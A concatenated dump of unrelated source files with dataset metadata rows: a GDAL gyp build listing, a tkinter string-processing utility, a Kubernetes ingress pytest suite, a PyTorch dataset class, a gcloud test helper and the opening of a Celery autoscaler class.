"gdal/alg/gdalmediancut.cpp",
"gdal/alg/gdalproximity.cpp",
"gdal/alg/gdalrasterize.cpp",
"gdal/alg/gdalrasterpolygonenumerator.cpp",
"gdal/alg/gdalsievefilter.cpp",
"gdal/alg/gdalsimplewarp.cpp",
"gdal/alg/gdaltransformer.cpp",
"gdal/alg/gdaltransformgeolocs.cpp",
"gdal/alg/gdalwarper.cpp",
"gdal/alg/gdalwarpkernel.cpp",
"gdal/alg/gdalwarpoperation.cpp",
"gdal/alg/llrasterize.cpp",
"gdal/alg/polygonize.cpp",
"gdal/alg/rasterfill.cpp",
"gdal/alg/thinplatespline.cpp",
"gdal/alg/gdal_crs.c",
# "gdal/alg/gdal_nrgcrs.c",
"gdal/alg/gdalwarpkernel_opencl.cpp",
"gdal/alg/gdalapplyverticalshiftgrid.cpp",
"gdal/alg/gdallinearsystem.cpp",
"gdal/gcore/gdal_misc.cpp",
"gdal/gcore/gdal_rat.cpp",
"gdal/gcore/gdal_mdreader.cpp",
"gdal/gcore/gdalallvalidmaskband.cpp",
"gdal/gcore/gdalclientserver.cpp",
"gdal/gcore/gdalcolortable.cpp",
"gdal/gcore/gdaldataset.cpp",
"gdal/gcore/gdaldefaultasync.cpp",
"gdal/gcore/gdaldefaultoverviews.cpp",
"gdal/gcore/gdaldllmain.cpp",
"gdal/gcore/gdaldriver.cpp",
"gdal/gcore/gdaldrivermanager.cpp",
"gdal/gcore/gdalexif.cpp",
"gdal/gcore/gdalgeorefpamdataset.cpp",
"gdal/gcore/gdaljp2abstractdataset.cpp",
"gdal/gcore/gdaljp2box.cpp",
"gdal/gcore/gdaljp2structure.cpp",
"gdal/gcore/gdaljp2metadata.cpp",
"gdal/gcore/gdaljp2metadatagenerator.cpp",
"gdal/gcore/gdalmajorobject.cpp",
"gdal/gcore/gdalmultidomainmetadata.cpp",
"gdal/gcore/gdalnodatamaskband.cpp",
"gdal/gcore/gdalnodatavaluesmaskband.cpp",
"gdal/gcore/gdalopeninfo.cpp",
"gdal/gcore/gdalpamdataset.cpp",
"gdal/gcore/gdalpamproxydb.cpp",
"gdal/gcore/gdalpamrasterband.cpp",
"gdal/gcore/gdalproxydataset.cpp",
"gdal/gcore/gdalproxypool.cpp",
"gdal/gcore/gdalrasterband.cpp",
"gdal/gcore/gdalrasterblock.cpp",
"gdal/gcore/gdalabstractbandblockcache.cpp",
"gdal/gcore/gdalarraybandblockcache.cpp",
"gdal/gcore/gdalhashsetbandblockcache.cpp",
"gdal/gcore/gdalrescaledalphaband.cpp",
"gdal/gcore/gdalvirtualmem.cpp",
"gdal/gcore/overview.cpp",
"gdal/gcore/rasterio.cpp",
"gdal/gcore/rasterio_ssse3.cpp",
"gdal/gcore/gdaloverviewdataset.cpp",
"gdal/gcore/mdreader/reader_alos.cpp",
"gdal/gcore/mdreader/reader_digital_globe.cpp",
"gdal/gcore/mdreader/reader_eros.cpp",
"gdal/gcore/mdreader/reader_geo_eye.cpp",
"gdal/gcore/mdreader/reader_kompsat.cpp",
"gdal/gcore/mdreader/reader_landsat.cpp",
"gdal/gcore/mdreader/reader_orb_view.cpp",
"gdal/gcore/mdreader/reader_pleiades.cpp",
"gdal/gcore/mdreader/reader_rapid_eye.cpp",
"gdal/gcore/mdreader/reader_rdk1.cpp",
"gdal/gcore/mdreader/reader_spot.cpp",
# "gdal/port/cpl_win32ce_api.cpp",
# "gdal/port/vsipreload.cpp",
"gdal/port/cpl_worker_thread_pool.cpp",
"gdal/port/cpl_atomic_ops.cpp",
"gdal/port/cpl_base64.cpp",
"gdal/port/cpl_conv.cpp",
"gdal/port/cpl_csv.cpp",
"gdal/port/cpl_error.cpp",
"gdal/port/cpl_findfile.cpp",
"gdal/port/cpl_getexecpath.cpp",
"gdal/port/cpl_google_oauth2.cpp",
"gdal/port/cpl_hash_set.cpp",
"gdal/port/cpl_http.cpp",
"gdal/port/cpl_list.cpp",
"gdal/port/cpl_minixml.cpp",
"gdal/port/cpl_minizip_ioapi.cpp",
"gdal/port/cpl_minizip_unzip.cpp",
"gdal/port/cpl_minizip_zip.cpp",
"gdal/port/cpl_multiproc.cpp",
"gdal/port/cpl_path.cpp",
"gdal/port/cpl_progress.cpp",
"gdal/port/cpl_quad_tree.cpp",
"gdal/port/cpl_recode.cpp",
"gdal/port/cpl_recode_iconv.cpp",
"gdal/port/cpl_recode_stub.cpp",
"gdal/port/cpl_spawn.cpp",
"gdal/port/cpl_string.cpp",
"gdal/port/cpl_strtod.cpp",
"gdal/port/cpl_time.cpp",
"gdal/port/cpl_virtualmem.cpp",
"gdal/port/cpl_vsi_mem.cpp",
"gdal/port/cpl_vsi_error.cpp",
"gdal/port/cpl_vsil.cpp",
"gdal/port/cpl_vsil_crypt.cpp",
"gdal/port/cpl_vsil_abstract_archive.cpp",
"gdal/port/cpl_vsil_buffered_reader.cpp",
"gdal/port/cpl_vsil_cache.cpp",
"gdal/port/cpl_vsil_curl.cpp",
"gdal/port/cpl_vsil_curl_streaming.cpp",
"gdal/port/cpl_vsil_gzip.cpp",
# "gdal/port/cpl_vsil_simple.cpp",
"gdal/port/cpl_vsil_sparsefile.cpp",
"gdal/port/cpl_vsil_stdin.cpp",
"gdal/port/cpl_vsil_stdout.cpp",
"gdal/port/cpl_vsil_subfile.cpp",
"gdal/port/cpl_vsil_tar.cpp",
"gdal/port/cpl_vsil_unix_stdio_64.cpp",
"gdal/port/cpl_vsil_win32.cpp",
"gdal/port/cpl_vsil_az.cpp",
"gdal/port/cpl_vsil_gs.cpp",
"gdal/port/cpl_vsil_hdfs.cpp",
"gdal/port/cpl_vsil_oss.cpp",
"gdal/port/cpl_vsil_s3.cpp",
"gdal/port/cpl_vsil_swift.cpp",
"gdal/port/cpl_vsisimple.cpp",
"gdal/port/cpl_xml_validate.cpp",
"gdal/port/cpl_alibaba_oss.cpp",
"gdal/port/cpl_azure.cpp",
"gdal/port/cpl_cpu_features.cpp",
"gdal/port/cpl_google_cloud.cpp",
"gdal/port/cpl_json.cpp",
"gdal/port/cpl_json_streaming_parser.cpp",
"gdal/port/cpl_md5.cpp",
"gdal/port/cpl_sha1.cpp",
"gdal/port/cpl_sha256.cpp",
"gdal/port/cpl_swift.cpp",
"gdal/port/cpl_userfaultfd.cpp",
"gdal/port/cplgetsymbol.cpp",
"gdal/port/cplkeywordparser.cpp",
"gdal/port/cplstring.cpp",
"gdal/port/cplstringlist.cpp",
"gdal/port/xmlreformat.cpp",
"gdal/frmts/jpeg/libjpeg/jcapimin.c",
"gdal/frmts/jpeg/libjpeg/jcapistd.c",
"gdal/frmts/jpeg/libjpeg/jccoefct.c",
"gdal/frmts/jpeg/libjpeg/jccolor.c",
"gdal/frmts/jpeg/libjpeg/jcdctmgr.c",
"gdal/frmts/jpeg/libjpeg/jchuff.c",
"gdal/frmts/jpeg/libjpeg/jcinit.c",
"gdal/frmts/jpeg/libjpeg/jcmainct.c",
"gdal/frmts/jpeg/libjpeg/jcmarker.c",
"gdal/frmts/jpeg/libjpeg/jcmaster.c",
"gdal/frmts/jpeg/libjpeg/jcomapi.c",
"gdal/frmts/jpeg/libjpeg/jcparam.c",
"gdal/frmts/jpeg/libjpeg/jcphuff.c",
"gdal/frmts/jpeg/libjpeg/jcprepct.c",
"gdal/frmts/jpeg/libjpeg/jcsample.c",
"gdal/frmts/jpeg/libjpeg/jctrans.c",
"gdal/frmts/jpeg/libjpeg/jdapimin.c",
"gdal/frmts/jpeg/libjpeg/jdapistd.c",
"gdal/frmts/jpeg/libjpeg/jdatadst.c",
"gdal/frmts/jpeg/libjpeg/jdatasrc.c",
"gdal/frmts/jpeg/libjpeg/jdcoefct.c",
"gdal/frmts/jpeg/libjpeg/jdcolor.c",
"gdal/frmts/jpeg/libjpeg/jddctmgr.c",
"gdal/frmts/jpeg/libjpeg/jdhuff.c",
"gdal/frmts/jpeg/libjpeg/jdinput.c",
"gdal/frmts/jpeg/libjpeg/jdmainct.c",
"gdal/frmts/jpeg/libjpeg/jdmarker.c",
"gdal/frmts/jpeg/libjpeg/jdmaster.c",
"gdal/frmts/jpeg/libjpeg/jdmerge.c",
"gdal/frmts/jpeg/libjpeg/jdphuff.c",
"gdal/frmts/jpeg/libjpeg/jdpostct.c",
"gdal/frmts/jpeg/libjpeg/jdsample.c",
"gdal/frmts/jpeg/libjpeg/jdtrans.c",
"gdal/frmts/jpeg/libjpeg/jerror.c",
"gdal/frmts/jpeg/libjpeg/jfdctflt.c",
"gdal/frmts/jpeg/libjpeg/jfdctfst.c",
"gdal/frmts/jpeg/libjpeg/jfdctint.c",
"gdal/frmts/jpeg/libjpeg/jidctflt.c",
"gdal/frmts/jpeg/libjpeg/jidctfst.c",
"gdal/frmts/jpeg/libjpeg/jidctint.c",
"gdal/frmts/jpeg/libjpeg/jidctred.c",
"gdal/frmts/jpeg/libjpeg/jmemansi.c",
"gdal/frmts/jpeg/libjpeg/jmemmgr.c",
"gdal/frmts/jpeg/libjpeg/jquant1.c",
"gdal/frmts/jpeg/libjpeg/jquant2.c",
"gdal/frmts/jpeg/libjpeg/jutils.c",
"gdal/third_party/LercLib/BitMask.cpp",
"gdal/third_party/LercLib/BitStuffer2.cpp",
"gdal/third_party/LercLib/Huffman.cpp",
"gdal/third_party/LercLib/Lerc.cpp",
"gdal/third_party/LercLib/Lerc2.cpp",
"gdal/third_party/LercLib/Lerc_c_api_impl.cpp",
"gdal/third_party/LercLib/RLE.cpp"
],
"include_dirs": [
"./gdal/alg",
"./gdal/alg/marching_squares",
"./gdal/apps",
"./gdal/gcore",
"./gdal/port",
"./gdal/frmts",
"./gdal/frmts/zlib",
"./gdal/frmts/vrt",
"./gdal/frmts/mem",
"./gdal/ogr",
"./gdal/ogr/ogrsf_frmts",
"./gdal/ogr/ogrsf_frmts/mem",
"./gdal/ogr/ogrsf_frmts/geojson",
"./gdal/frmts/jpeg/libjpeg"
],
"dependencies": [
'<@(gdal_format_gyps)'
],
"defines": [
'<@(gdal_format_defs)'
],
"conditions": [
["OS == 'win'", {
"sources": [
"gdal/port/cpl_odbc.cpp"
],
"link_settings": {
"libraries": [
"-lws2_32.lib",
"-lodbccp32.lib"
]
}
}]
],
"direct_dependent_settings": {
"include_dirs": [
"./gdal/alg",
"./gdal/apps",
"./gdal/gcore",
"./gdal/port",
"./gdal/ogr",
"./gdal/ogr/ogrsf_frmts"
],
"conditions": [
["OS == 'win'", {
"include_dirs": ["./arch/win"]
}, {
"include_dirs": ["./arch/unix"]
}],
[ "OS == 'mac'", {
"libraries": [
"-liconv"
]
}]
],
"defines": [
"_LARGEFILE_SOURCE",
"_FILE_OFFSET_BITS=64"
]
}
}
]
}
| 33.476064
| 62
| 0.671486
|
a44d3ad2edf4f992e2f1918ad4f14d9cb424d432
| 6,917
|
py
|
Python
|
main.py
|
Georege/python_strings_handler
|
3211bab8ea7123be4167d61b372c0df3605f93d0
|
[
"MIT"
] | null | null | null |
main.py
|
Georege/python_strings_handler
|
3211bab8ea7123be4167d61b372c0df3605f93d0
|
[
"MIT"
] | null | null | null |
main.py
|
Georege/python_strings_handler
|
3211bab8ea7123be4167d61b372c0df3605f93d0
|
[
"MIT"
] | null | null | null |
import base64
from tkinter import *
from tkinter import messagebox
from urllib.parse import urlencode, parse_qs, parse_qsl
import json
# Get the string length
def getlen():
source = source_input.get('0.0', 'end-1c')
if source:
output = len(source)
# print('output type is :{}'.format(type(output)))
target_output.config(state='normal')
target_output.delete("1.0", 'end')
        target_output.insert('end', 'Length: {} characters'.format(output))
target_output.config(state='disabled')
else:
messagebox.showinfo(
'系统提示:', "输入框不能为空")
# Deduplicate lines
def quchong():
source = source_input.get('0.0', 'end-1c')
if source:
# print('source type is :{}'.format(type(source)))
input_list = source.split('\n')
# print('input_list type is :{}'.format(type(input_list)))
output = '\n'.join([x for x in set(input_list) if x])
# print('output type is :{}'.format(type(output)))
target_output.config(state='normal')
target_output.delete("1.0", 'end')
target_output.insert('end', '{}'.format(output))
target_output.config(state='disabled')
else:
messagebox.showinfo(
'系统提示:', "输入框不能为空")
# Join lines with commas
def pinjie():
source = source_input.get('0.0', 'end-1c')
if source:
# print('source type is :{}'.format(type(source)))
input_list = source.split('\n')
# print('input_list type is :{}'.format(type(input_list)))
output = ','.join([x for x in input_list if x])
# print('output type is :{}'.format(type(output)))
target_output.config(state='normal')
target_output.delete("1.0", 'end')
target_output.insert('end', '{}'.format(output))
target_output.config(state='disabled')
else:
messagebox.showinfo(
'系统提示:', "输入框不能为空")
# &转换行
def convert_n():
source = source_input.get('0.0', 'end-1c')
if source:
# print('source type is :{}'.format(type(source)))
input_list = source.split('&')
# print('input_list type is :{}'.format(type(input_list)))
output = '\n'.join([x for x in input_list if x])
# print('output type is :{}'.format(type(output)))
target_output.config(state='normal')
target_output.delete("1.0", 'end')
target_output.insert('end', '{}'.format(output))
target_output.config(state='disabled')
else:
messagebox.showinfo(
'系统提示:', "输入框不能为空")
# Convert '@' to newlines
def convert_i():
source = source_input.get('0.0', 'end-1c')
if source:
# print('source type is :{}'.format(type(source)))
input_list = source.split('@')
# print('input_list type is :{}'.format(type(input_list)))
output = '\n'.join([x for x in input_list if x])
# print('output type is :{}'.format(type(output)))
target_output.config(state='normal')
target_output.delete("1.0", 'end')
target_output.insert('end', '{}'.format(output))
target_output.config(state='disabled')
else:
messagebox.showinfo(
'系统提示:', "输入框不能为空")
# Convert slashes to hyphens
def convert():
source = source_input.get('0.0', 'end-1c')
if source:
# print('source type is :{}'.format(type(source)))
input_list = source.split('/')
# print('input_list type is :{}'.format(type(input_list)))
output = '-'.join([x for x in input_list if x])
# print('output type is :{}'.format(type(output)))
target_output.config(state='normal')
target_output.delete("1.0", 'end')
target_output.insert('end', '{}'.format(output))
target_output.config(state='disabled')
else:
messagebox.showinfo(
'系统提示:', "输入框不能为空")
# Convert a dict to URL params: encode the stored dict as a URL query string, i.e. into the key1=value1&key2=value2 form
def convert_params():
source = source_input.get('0.0', 'end-1c')
if source:
# print('source type is :{}'.format(type(source)))
output = urlencode(json.loads(source))
# print('output type is :{}'.format(type(output)))
target_output.config(state='normal')
target_output.delete("1.0", 'end')
target_output.insert('end', '{}'.format(output))
target_output.config(state='disabled')
else:
messagebox.showinfo(
'系统提示:', "输入框不能为空")
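# Illustrative round trip (assumed values):
#   urlencode(json.loads('{"a": "1", "b": "2"}'))  ->  'a=1&b=2'
#   parse_qs('a=1&b=2')                            ->  {'a': ['1'], 'b': ['2']}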
# Convert URL params back to a dict
def convert_dict():
source = source_input.get('0.0', 'end-1c')
if source:
# print('source type is :{}'.format(type(source)))
out_dict = parse_qs(source)
output = json.dumps(
{key: value[0] for key, value in out_dict.items()}, indent=4, ensure_ascii=False)
# print('output type is :{}'.format(type(output)))
target_output.config(state='normal')
target_output.delete("1.0", 'end')
target_output.insert('end', '{}'.format(output))
target_output.config(state='disabled')
else:
messagebox.showinfo(
'系统提示:', "输入框不能为空")
# Copy the result to the clipboard
def copy():
output = target_output.get('0.0', 'end-1c')
if output:
root.clipboard_clear()
root.clipboard_append(output)
root.update()
        messagebox.showinfo('System message:', '{}\nCopied successfully'.format(output))
else:
messagebox.showinfo(
'系统提示:', "输入框不能为空")
if __name__ == "__main__":
input_out_width = 130
input_out_height = 20
root = Tk()
root.title("字符串处理")
root.resizable(width=False, height=False)
# line 1
Label(root, text="请输入需要处理的字符串:").grid(
row=1, column=1)
source_input = Text(root, width=input_out_width, height=input_out_height)
source_input.grid(
row=1, column=2, rowspan=2)
# button
Button(root, text="获取长度", command=lambda: getlen()).grid(
row=1, column=3, padx=10)
Button(root, text="列去重", command=lambda: quchong()).grid(
row=1, column=4, padx=10)
Button(root, text="逗号拼接", command=lambda: pinjie()).grid(
row=1, column=5, padx=10)
Button(root, text="转义斜杠", command=lambda: convert()).grid(
row=2, column=3, padx=10)
Button(root, text="转义&为换行", command=lambda: convert_n()).grid(
row=2, column=4, padx=10)
Button(root, text="转义@为换行", command=lambda: convert_i()).grid(
row=2, column=5, padx=10)
Button(root, text="转义字典为params", command=lambda: convert_params()).grid(
row=3, column=3, padx=10)
Button(root, text="转义params为字典", command=lambda: convert_dict()).grid(
row=3, column=4, padx=10)
# Button(root, text="转义@为换行", command=lambda: convert_i()).grid(
# row=3, column=5, padx=10)
# line 2
Label(root, text="处理后的结果是:").grid(
row=3, column=1)
target_output = Text(root, width=input_out_width, height=input_out_height)
target_output.grid(
row=3, column=2, rowspan=2)
# button
Button(root, text="复制", command=lambda: copy()).grid(
row=4, column=3)
root.mainloop()
| 33.095694
| 93
| 0.595345
|
38f4c85dbf406604a5b60fbfd8f56cb7a54d4db6
| 6,962
|
py
|
Python
|
tests/suite/test_externalname_service.py
|
snebel29/kubernetes-ingress
|
a31cd87288fa102ef9f094da7ecd371e9b36c680
|
[
"Apache-2.0"
] | 1
|
2021-11-07T18:54:51.000Z
|
2021-11-07T18:54:51.000Z
|
tests/suite/test_externalname_service.py
|
snebel29/kubernetes-ingress
|
a31cd87288fa102ef9f094da7ecd371e9b36c680
|
[
"Apache-2.0"
] | 123
|
2021-09-06T19:21:23.000Z
|
2022-03-31T05:22:42.000Z
|
tests/suite/test_externalname_service.py
|
snebel29/kubernetes-ingress
|
a31cd87288fa102ef9f094da7ecd371e9b36c680
|
[
"Apache-2.0"
] | null | null | null |
import requests
import pytest
from settings import TEST_DATA
from suite.fixtures import PublicEndpoint
from suite.resources_utils import create_ingress_from_yaml, create_service_with_name, \
create_namespace_with_name_from_yaml, create_deployment_with_name, delete_namespace, ensure_response_from_backend
from suite.resources_utils import replace_configmap_from_yaml, create_service_from_yaml
from suite.resources_utils import replace_configmap, delete_ingress, delete_service, get_ingress_nginx_template_conf
from suite.resources_utils import get_first_pod_name, ensure_connection_to_public_endpoint, wait_before_test
from suite.yaml_utils import get_first_ingress_host_from_yaml
class ExternalNameSetup:
"""Encapsulate ExternalName example details.
Attributes:
public_endpoint: PublicEndpoint
ingress_name:
ingress_pod_name:
ingress_host:
service: external-name example service name
external_host: external-name example external host
namespace: external-name example namespace
"""
def __init__(self, public_endpoint: PublicEndpoint,
ingress_name, ingress_host, ingress_pod_name, service, external_host, namespace):
self.public_endpoint = public_endpoint
self.ingress_name = ingress_name
self.ingress_pod_name = ingress_pod_name
self.namespace = namespace
self.ingress_host = ingress_host
self.service = service
self.external_host = external_host
@pytest.fixture(scope="class")
def external_name_setup(request,
kube_apis,
ingress_controller_prerequisites,
ingress_controller_endpoint, ingress_controller, test_namespace) -> ExternalNameSetup:
print("------------------------- Deploy External-Backend -----------------------------------")
external_ns = create_namespace_with_name_from_yaml(kube_apis.v1, "external-ns", f"{TEST_DATA}/common/ns.yaml")
external_svc_name = create_service_with_name(kube_apis.v1, external_ns, "external-backend-svc")
create_deployment_with_name(kube_apis.apps_v1_api, external_ns, "external-backend")
print("------------------------- Deploy External-Name-Example -----------------------------------")
ingress_name = create_ingress_from_yaml(kube_apis.networking_v1, test_namespace,
f"{TEST_DATA}/externalname-services/externalname-ingress.yaml")
ingress_host = get_first_ingress_host_from_yaml(f"{TEST_DATA}/externalname-services/externalname-ingress.yaml")
external_host = f"{external_svc_name}.{external_ns}.svc.cluster.local"
config_map_name = ingress_controller_prerequisites.config_map["metadata"]["name"]
replace_configmap_from_yaml(kube_apis.v1, config_map_name,
ingress_controller_prerequisites.namespace,
f"{TEST_DATA}/externalname-services/nginx-config.yaml")
svc_name = create_service_from_yaml(kube_apis.v1,
test_namespace, f"{TEST_DATA}/externalname-services/externalname-svc.yaml")
ensure_connection_to_public_endpoint(ingress_controller_endpoint.public_ip,
ingress_controller_endpoint.port,
ingress_controller_endpoint.port_ssl)
ic_pod_name = get_first_pod_name(kube_apis.v1, ingress_controller_prerequisites.namespace)
def fin():
print("Clean up External-Name-Example:")
delete_namespace(kube_apis.v1, external_ns)
replace_configmap(kube_apis.v1, config_map_name,
ingress_controller_prerequisites.namespace,
ingress_controller_prerequisites.config_map)
delete_ingress(kube_apis.networking_v1, ingress_name, test_namespace)
delete_service(kube_apis.v1, svc_name, test_namespace)
request.addfinalizer(fin)
return ExternalNameSetup(ingress_controller_endpoint,
ingress_name, ingress_host, ic_pod_name, svc_name, external_host, test_namespace)
@pytest.mark.ingresses
@pytest.mark.skip_for_nginx_oss
class TestExternalNameService:
def test_resolver(self, external_name_setup):
wait_before_test()
req_url = f"http://{external_name_setup.public_endpoint.public_ip}:{external_name_setup.public_endpoint.port}/"
ensure_response_from_backend(req_url, external_name_setup.ingress_host)
resp = requests.get(req_url, headers={"host": external_name_setup.ingress_host}, verify=False)
assert resp.status_code == 200
def test_ic_template_config_upstream_zone(self, kube_apis, ingress_controller_prerequisites,
ingress_controller, external_name_setup):
result_conf = get_ingress_nginx_template_conf(kube_apis.v1,
external_name_setup.namespace,
external_name_setup.ingress_name,
external_name_setup.ingress_pod_name,
ingress_controller_prerequisites.namespace)
line = f"zone {external_name_setup.namespace}-" \
f"{external_name_setup.ingress_name}-" \
f"{external_name_setup.ingress_host}-{external_name_setup.service}-80 256k;"
assert line in result_conf
def test_ic_template_config_upstream_rule(self, kube_apis, ingress_controller_prerequisites,
ingress_controller, external_name_setup):
result_conf = get_ingress_nginx_template_conf(kube_apis.v1,
external_name_setup.namespace,
external_name_setup.ingress_name,
external_name_setup.ingress_pod_name,
ingress_controller_prerequisites.namespace)
assert "random two least_conn;" in result_conf
def test_ic_template_config_upstream_server(self, kube_apis, ingress_controller_prerequisites,
ingress_controller, ingress_controller_endpoint, external_name_setup):
result_conf = get_ingress_nginx_template_conf(kube_apis.v1,
external_name_setup.namespace,
external_name_setup.ingress_name,
external_name_setup.ingress_pod_name,
ingress_controller_prerequisites.namespace)
assert f"server {external_name_setup.external_host}:80 max_fails=1 fail_timeout=10s max_conns=0 resolve;"\
in result_conf
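# Hedged invocation sketch (marker names are taken from the decorators above):
#   pytest tests/suite/test_externalname_service.py -m ingresses
# The skip_for_nginx_oss marker indicates these assertions target NGINX Plus
# builds of the ingress controller.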
| 59.504274
| 119
| 0.654984
|
7f986ac05901fa9ae21da24fca58fd455d3ee02f
| 563
|
py
|
Python
|
varvar/__init__.py
|
drorspei/varvar
|
1f7daf6d82cdfdce396f9eb81b54a5f470411641
|
[
"MIT"
] | null | null | null |
varvar/__init__.py
|
drorspei/varvar
|
1f7daf6d82cdfdce396f9eb81b54a5f470411641
|
[
"MIT"
] | null | null | null |
varvar/__init__.py
|
drorspei/varvar
|
1f7daf6d82cdfdce396f9eb81b54a5f470411641
|
[
"MIT"
] | null | null | null |
import threading
def htrain(*args, **kwargs):
from varvar.htrees import multiplicative_variance_trees as _htrain
return _htrain(*args, **kwargs)
def qtrain(*args, **kwargs):
from varvar.qtrees import multiplicative_variance_trees as _qtrain
return _qtrain(*args, **kwargs)
def predict(*args, **kwargs):
from varvar.predict import predict as _predict
return _predict(*args, **kwargs)
def import_():
import varvar.qtrees
import varvar.htrees
import varvar.predict
_thread = threading.Thread(target=import_)
_thread.start()
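

# Hypothetical usage sketch (added for illustration; the exact htrain/predict
# signatures live in varvar.htrees and varvar.predict and are assumed here):
#     models = htrain(X, y)        # X: features, y: targets
#     var = predict(models, X)     # multiplicative variance estimates
# The wrappers above defer the heavy imports, while the background thread
# started above warms them so the first real call does not pay import cost.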
| 24.478261
| 70
| 0.737123
|
98beeda8c7af38c0e928ee2a3dd0522d19a67bcd
| 156
|
py
|
Python
|
src/vone/admin.py
|
SerhatTeker/django-rest-todo
|
5934ba552a95d3960f9344fde6c2586017774403
|
[
"BSD-3-Clause"
] | 1
|
2021-06-28T14:59:35.000Z
|
2021-06-28T14:59:35.000Z
|
src/vone/admin.py
|
SerhatTeker/django-rest-todo
|
5934ba552a95d3960f9344fde6c2586017774403
|
[
"BSD-3-Clause"
] | 1
|
2022-01-21T20:02:37.000Z
|
2022-01-21T20:02:37.000Z
|
src/vone/admin.py
|
SerhatTeker/django-rest-todo
|
5934ba552a95d3960f9344fde6c2586017774403
|
[
"BSD-3-Clause"
] | null | null | null |
from django.contrib import admin
from .models import Category, Tag, Task
admin.site.register(Tag)
admin.site.register(Category)
admin.site.register(Task)
| 19.5
| 39
| 0.801282
|
f04b8bc94d9bf1c72b0d339620fbed170a4bb947
| 2,160
|
py
|
Python
|
data/single_item_dataset.py
|
Finomnis/pytorch-CycleGAN-and-pix2pix
|
a10b70da7e366bde9012311f3f8a1c4dc14d922d
|
[
"BSD-3-Clause"
] | null | null | null |
data/single_item_dataset.py
|
Finomnis/pytorch-CycleGAN-and-pix2pix
|
a10b70da7e366bde9012311f3f8a1c4dc14d922d
|
[
"BSD-3-Clause"
] | null | null | null |
data/single_item_dataset.py
|
Finomnis/pytorch-CycleGAN-and-pix2pix
|
a10b70da7e366bde9012311f3f8a1c4dc14d922d
|
[
"BSD-3-Clause"
] | null | null | null |
import os.path
from data.base_dataset import BaseDataset, get_params, get_transform
from data.image_folder import make_dataset
from PIL import Image
class SingleItemDataset(BaseDataset):
"""A dataset class for a single image.
"""
def __init__(self, opt, imgIn, imgOut=None):
"""Initialize this dataset class.
Parameters:
opt (Option class) -- stores all the experiment flags; needs to be a subclass of BaseOptions
"""
BaseDataset.__init__(self, opt)
self.imgIn = imgIn.convert('RGB')
self.imgOut = imgOut
if not imgOut:
            self.imgOut = Image.new('RGB', imgIn.size, (255, 255, 255))
assert(self.opt.load_size >= self.opt.crop_size) # crop_size should be smaller than the size of loaded image
self.input_nc = self.opt.output_nc if self.opt.direction == 'BtoA' else self.opt.input_nc
self.output_nc = self.opt.input_nc if self.opt.direction == 'BtoA' else self.opt.output_nc
def __getitem__(self, index):
"""Return a data point and its metadata information.
Parameters:
index - - a random integer for data indexing
Returns a dictionary that contains A, B, A_paths and B_paths
A (tensor) - - an image in the input domain
B (tensor) - - its corresponding image in the target domain
A_paths (str) - - image paths
B_paths (str) - - image paths (same as A_paths)
"""
# read a image given a random integer index
A = self.imgIn
B = self.imgOut
# apply the same transform to both A and B
transform_params = get_params(self.opt, A.size)
A_transform = get_transform(self.opt, transform_params, grayscale=(self.input_nc == 1), add_noise=self.opt.add_noise)
B_transform = get_transform(self.opt, transform_params, grayscale=(self.output_nc == 1))
A = A_transform(A)
B = B_transform(B)
return {'A': A.unsqueeze(0), 'B': B.unsqueeze(0), 'A_paths': "", 'B_paths': ""}
def __len__(self):
"""Return the total number of images in the dataset."""
return 1
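

# Hypothetical usage sketch (added; `opt` would come from the project's
# option parser, e.g. TestOptions().parse(), which is assumed here):
#     from PIL import Image
#     ds = SingleItemDataset(opt, Image.open('input.png'))
#     item = ds[0]  # dict with 1xCxHxW tensors 'A' and 'B'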
| 37.894737
| 125
| 0.6375
|
5175a761f704421f8f761a3e177f7f0eebe8ebea
| 1,505
|
py
|
Python
|
tests/system/data_sources/deploy_cloudsql/gcloud_context.py
|
ajw0100/professional-services-data-validator
|
b1dc82adf92adf19702f5ef41590c62c7c128c74
|
[
"Apache-2.0"
] | 167
|
2021-05-27T19:43:43.000Z
|
2022-03-16T02:42:30.000Z
|
tests/system/data_sources/deploy_cloudsql/gcloud_context.py
|
ajw0100/professional-services-data-validator
|
b1dc82adf92adf19702f5ef41590c62c7c128c74
|
[
"Apache-2.0"
] | 110
|
2021-05-27T14:49:09.000Z
|
2022-03-31T11:10:41.000Z
|
tests/system/data_sources/deploy_cloudsql/gcloud_context.py
|
ajw0100/professional-services-data-validator
|
b1dc82adf92adf19702f5ef41590c62c7c128c74
|
[
"Apache-2.0"
] | 32
|
2021-06-23T22:00:59.000Z
|
2022-03-30T03:32:20.000Z
|
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" Context manager for gcloud which redirects config directory to temp location """
import os
import subprocess
class GCloudContext(object):
def __init__(self, project_id, creds_file=None):
self._project_id = project_id
self._creds_file = creds_file
def __enter__(self):
if self._creds_file:
self.Run("auth", "activate-service-account", "--key-file", self._creds_file)
self.Run("config", "set", "project", self._project_id)
return self
def __exit__(self, exc_type, exc_value, exc_traceback):
pass
def Run(self, *args, **kwargs):
""" Runs gcloud command and returns output"""
env = kwargs.pop("env", None)
if not env:
env = os.environ.copy()
env["CLOUDSDK_CORE_PRINT_UNHANDLED_TRACEBACKS"] = "true"
fullcmd = ("gcloud",) + args
return subprocess.check_output(fullcmd, env=env, **kwargs)
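

# Hypothetical usage sketch (added; assumes the gcloud CLI is on PATH and
# creds.json is a service-account key file):
#     with GCloudContext("my-project", creds_file="creds.json") as ctx:
#         print(ctx.Run("config", "list"))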
| 35
| 88
| 0.686379
|
188a94cea521cb01f861cbddba827713ab486a03
| 2,505
|
py
|
Python
|
celery/worker/autoscale.py
|
frac/celery
|
b6b32ca9a951e81722c52412c3f8a1cff67109dd
|
[
"BSD-3-Clause"
] | 1
|
2015-11-05T02:49:59.000Z
|
2015-11-05T02:49:59.000Z
|
celery/worker/autoscale.py
|
frac/celery
|
b6b32ca9a951e81722c52412c3f8a1cff67109dd
|
[
"BSD-3-Clause"
] | null | null | null |
celery/worker/autoscale.py
|
frac/celery
|
b6b32ca9a951e81722c52412c3f8a1cff67109dd
|
[
"BSD-3-Clause"
] | null | null | null |
import os
import sys
import threading
import traceback
from time import sleep, time
from celery.worker import state
class Autoscaler(threading.Thread):
def __init__(self, pool, max_concurrency, min_concurrency=0,
keepalive=30, logger=None):
threading.Thread.__init__(self)
self.pool = pool
self.max_concurrency = max_concurrency
self.min_concurrency = min_concurrency
self.keepalive = keepalive
self.logger = logger
